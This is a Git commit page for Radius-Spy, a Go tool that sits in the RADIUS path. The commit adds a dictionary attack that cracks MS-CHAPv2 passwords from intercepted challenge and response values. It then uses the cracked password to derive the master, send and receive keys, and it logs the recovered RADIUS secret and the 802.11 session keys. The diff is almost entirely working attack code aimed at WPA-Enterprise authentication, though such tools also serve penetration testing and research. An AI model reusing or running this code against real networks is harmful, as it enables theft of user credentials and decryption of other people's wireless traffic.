Added dictionary attack for password

famez · Sep 6, 2019 · 397a429 · 397a429
1 parent 3c6772c
commit 397a429
Show file tree

Hide file tree

Showing 4 changed files with 117 additions and 21 deletions.
diff --git a/attack/password.go b/attack/password.go
@@ -0,0 +1,51 @@
+package attack
+
+import (
+	"bufio"
+	"os"
+	"radius/eap"
+	"radius/session"
+
+	"github.com/golang/glog"
+)
+
+func GuessPasswordFromMsCHAPv2(authChallenge, peerChallenge [16]byte, username string, ntResponse [24]byte) (bool, string) {
+
+	config := session.GetConfig()
+
+	passwordsFile := config.GetPasswordsFile()
+
+	file, err := os.Open(passwordsFile)
+	if err != nil {
+		glog.V(1).Infoln(err)
+		return false, ""
+	}
+
+	defer file.Close()
+
+	defer glog.V(2).Infoln("Passwords scanner finished ")
+
+	scanner := bufio.NewScanner(file)
+
+	for scanner.Scan() {
+
+		password := scanner.Text()
+
+		var calculatedResponse [24]byte
+
+		aux := eap.MsChapV2GenerateNTResponse(authChallenge, peerChallenge, username, password)
+
+		if len(aux) != 24 {
+			continue
+		}
+
+		copy(calculatedResponse[:], aux)
+
+		if calculatedResponse == ntResponse {
+			return true, password
+		}
+
+	}
+
+	return false, ""
+}
diff --git a/main/main.go b/main/main.go
@@ -216,6 +216,7 @@ func manglePacket(manglePacket *radius.RadiusPacket, from net.UDPAddr, to net.UD
 
 	if context.GetSecret() == "" { //No secret discovered
 		if ok, secret := attack.GuessSecret(manglePacket.Clone(), client, server, clientToServer); ok {
+			glog.V(0).Infoln("Secret cracked ", secret)
 			context.SetSecret(secret)
 		}
 	}
@@ -382,6 +383,13 @@ func manageNASPeap(manglePacket *radius.RadiusPacket, from net.UDPAddr, to net.U
 
 				//Derived Key obtained
 				context.SetDerivedKey(keyringMaterial)
+
+				glog.V(0).Infoln("802.11 Recv Key:")
+				glog.V(0).Infoln("\n" + hex.Dump(keyringMaterial[:32]))
+
+				glog.V(0).Infoln("802.11 Send Key:")
+				glog.V(0).Infoln("\n" + hex.Dump(keyringMaterial[32:64]))
+
 			}
 
 		}
@@ -733,27 +741,45 @@ func manageMsChapV2(packet *eap.EapMSCHAPv2, context *session.ContextInfo) {
 
 		calculatedResponse := eap.MsChapV2GenerateNTResponse(context.GetMsChapV2AuthChallenge(), context.GetMsChapV2PeerChallenge(), context.GetUserName(), "password")
 
-		glog.V(3).Infoln("Local NT-Response")
-		glog.V(3).Infoln("\n" + hex.Dump(calculatedResponse))
+		var ntResponseArray [24]byte
+
+		copy(ntResponseArray[:], ntResponse)
+
+		if cracked, password := attack.GuessPasswordFromMsCHAPv2(context.GetMsChapV2AuthChallenge(), context.GetMsChapV2PeerChallenge(),
+			context.GetUserName(), ntResponseArray); cracked {
+
+			glog.V(0).Infoln("Password cracked: ", password)
+			context.SetPassword(password)
+
+		}
+
+		if context.GetPassword() != "" {
+
+			password := context.GetPassword()
+
+			glog.V(3).Infoln("Local NT-Response")
+			glog.V(3).Infoln("\n" + hex.Dump(calculatedResponse))
 
-		glog.V(2).Infoln("Calculating Master key")
+			glog.V(2).Infoln("Calculating Master key")
 
-		masterKey := eap.MsChapV2GetMasterKeyFromPsswd("password", ntResponse)
+			masterKey := eap.MsChapV2GetMasterKeyFromPsswd(password, ntResponse)
 
-		glog.V(3).Infoln("Calculated Master Key:")
-		glog.V(3).Infoln("\n" + hex.Dump(masterKey))
+			glog.V(3).Infoln("Calculated Master Key:")
+			glog.V(3).Infoln("\n" + hex.Dump(masterKey))
 
-		glog.V(2).Infoln("Calculating Send key")
+			glog.V(2).Infoln("Calculating Send key")
 
-		sendKey := eap.MsChapV2GetSendKey(masterKey)
-		glog.V(3).Infoln("Calculated Send Key:")
-		glog.V(3).Infoln("\n" + hex.Dump(sendKey))
+			sendKey := eap.MsChapV2GetSendKey(masterKey)
+			glog.V(3).Infoln("Calculated Send Key:")
+			glog.V(3).Infoln("\n" + hex.Dump(sendKey))
 
-		glog.V(2).Infoln("Calculating Receive key")
+			glog.V(2).Infoln("Calculating Receive key")
 
-		receiveKey := eap.MsChapV2GetReceiveKey(masterKey)
-		glog.V(3).Infoln("Calculated Receive Key:")
-		glog.V(3).Infoln("\n" + hex.Dump(receiveKey))
+			receiveKey := eap.MsChapV2GetReceiveKey(masterKey)
+			glog.V(3).Infoln("Calculated Receive Key:")
+			glog.V(3).Infoln("\n" + hex.Dump(receiveKey))
+
+		}
 
 	case eap.MsChapV2Success:
 
@@ -766,10 +792,13 @@ func manageMsChapV2(packet *eap.EapMSCHAPv2, context *session.ContextInfo) {
 
 			//Calculate ourselves the result of the message field
 
-			calcMessage := eap.MsChapV2GenerateAuthenticatorResponse("password", context.GetMsChapV2NTResponse(),
-				context.GetMsChapV2PeerChallenge(), context.GetMsChapV2AuthChallenge(), context.GetUserName())
+			if context.GetPassword() != "" {
+				password := context.GetPassword()
+				calcMessage := eap.MsChapV2GenerateAuthenticatorResponse(password, context.GetMsChapV2NTResponse(),
+					context.GetMsChapV2PeerChallenge(), context.GetMsChapV2AuthChallenge(), context.GetUserName())
 
-			glog.V(2).Infoln("Calculated message:", calcMessage)
+				glog.V(2).Infoln("Calculated message:", calcMessage)
+			}
 
 		}
 
@@ -942,12 +971,13 @@ func updateContextFromPacket(context *session.ContextInfo, manglePacket *radius.
 func main() {
 
 	secrets := flag.String("secrets", "secrets.txt", "Secrets file to perform dictionary attacks")
+	passwords := flag.String("passwords", "passwords.txt", "Passwords file to perform dictionary attacks")
 
 	active := flag.Bool("active", false, "When activated, communications will be intercepted, otherwise, we only forward packets")
 
 	flag.Parse()
 
-	session.SetConfig(*secrets)
+	session.SetConfig(*secrets, *passwords)
 
 	glog.V(0).Infoln("Radius-Spy. Version", softVersion)
 

diff --git a/session/config.go b/session/config.go
@@ -1,14 +1,16 @@
 package session
 
 type config struct {
-	secretsFile string //File to perform a dictionary attack
+	secretsFile   string //File to perform a dictionary attack
+	passwordsFile string //
 }
 
 var privConfig config
 
-func SetConfig(secrets string) {
+func SetConfig(secrets, passwords string) {
 	privConfig = config{
-		secretsFile: secrets,
+		secretsFile:   secrets,
+		passwordsFile: passwords,
 	}
 }
 
@@ -19,3 +21,7 @@ func GetConfig() config {
 func (config config) GetSecretsFile() string {
 	return config.secretsFile
 }
+
+func (config config) GetPasswordsFile() string {
+	return config.passwordsFile
+}
diff --git a/session/context.go b/session/context.go
@@ -62,6 +62,7 @@ type ContextInfo struct {
 	userName        string   //User name used by the STA to authenticate
 	secret          string
 	derivedKey      []byte //Derived key to be used between NAS and STA to encrypt WIFI communications
+	password        string //Password for the identity that is being identified
 }
 
 var contexts []*ContextInfo
@@ -472,6 +473,14 @@ func (context *ContextInfo) SetDerivedKey(key []byte) {
 	context.derivedKey = key
 }
 
+func (context ContextInfo) GetPassword() string {
+	return context.password
+}
+
+func (context *ContextInfo) SetPassword(password string) {
+	context.password = password
+}
+
 func (context ContextInfo) PrintInfo() {
 
 	glog.V(2).Infoln("**Context info**")